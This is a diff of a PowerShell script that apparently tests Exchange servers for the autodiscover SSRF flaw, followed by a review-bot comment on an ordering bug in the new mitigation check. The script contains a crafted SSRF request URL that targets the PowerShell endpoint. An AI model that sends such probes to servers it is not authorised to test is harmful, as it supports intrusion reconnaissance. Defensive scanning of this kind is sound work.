| skipped 6 lines |
7 | 7 | | Write-host "Running autodiscover test..." -ForegroundColor Cyan |
8 | 8 | | try |
9 | 9 | | { |
10 | | - | $webtest1 = Invoke-WebRequest -uri "https://$target/autodiscover" -Verbose |
| 10 | + | $webtest1 = Invoke-WebRequest -uri "https://$target/autodiscover" -Verbose -DisableKeepAlive |
11 | 11 | | } |
12 | 12 | | catch |
13 | 13 | | { |
| skipped 1 lines |
15 | 15 | | $Failure = $_.Exception.Response |
16 | 16 | | $Failure.Headers.tostring() |
17 | 17 | | } |
18 | | - | |
19 | | - | |
20 | 18 | | |
21 | 19 | | Write-host "Running autodiscover SSRF test..." -ForegroundColor Cyan |
22 | 20 | | try |
23 | 21 | | { |
24 | 22 | | write-host "testing site..." -ForegroundColor Gray |
25 | | - | $webtest2 = invoke-webrequest -uri "https://$target/autodiscover/[email protected]/owa/&Email=autodiscover/[email protected]&Protocol=HACKER&Protocol=PowerShell" -Verbose |
| 23 | + | $webtest2 = invoke-webrequest -uri "https://$target/autodiscover/[email protected]/owa/&Email=autodiscover/[email protected]&Protocol=HACKER&Protocol=PowerShell" -Verbose -DisableKeepAlive |
26 | 24 | | } |
27 | 25 | | catch |
28 | 26 | | { |
29 | 27 | | write-host "Caught" -ForegroundColor Red |
| 28 | + | $failure.StatusCode |
| 29 | + | if($failure.StatusCode -contains "BadGateway"){write-host "Mitigation Detected" -ForegroundColor Green} |
30 | 30 | | $Failure = $_.Exception.Response |
31 | 31 | | $Failure.Headers.tostring() |
32 | 32 | | $Failure.Headers.tostring() | findstr /I "X-OWA-Version" |
| skipped 26 lines |
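Review bot: In the SSRF test's catch block, the two added lines read `$failure.StatusCode` before `$Failure = $_.Exception.Response` runs two lines further down. The "Mitigation Detected" check therefore evaluates whatever `$Failure` held from the first test's catch (or `$null` if that request succeeded), not the response to this request, so the script can print a green "Mitigation Detected" for a server that did not return 502 here, or miss one that did. Move the assignment to the first line of the catch and compare with `-eq`, since `-contains` is a collection operator: `$Failure = $_.Exception.Response` followed by `if ($Failure.StatusCode -eq 'BadGateway') { write-host "Mitigation Detected" -ForegroundColor Green }`. `$_.Exception.Response` is presumably `$null` when the request fails before any HTTP response arrives (DNS, TLS, timeout), so a null check before reading `.StatusCode` and `.Headers` would keep the output from being misread. The catch block closes in the skipped lines, so any later use of `$Failure` is not visible here.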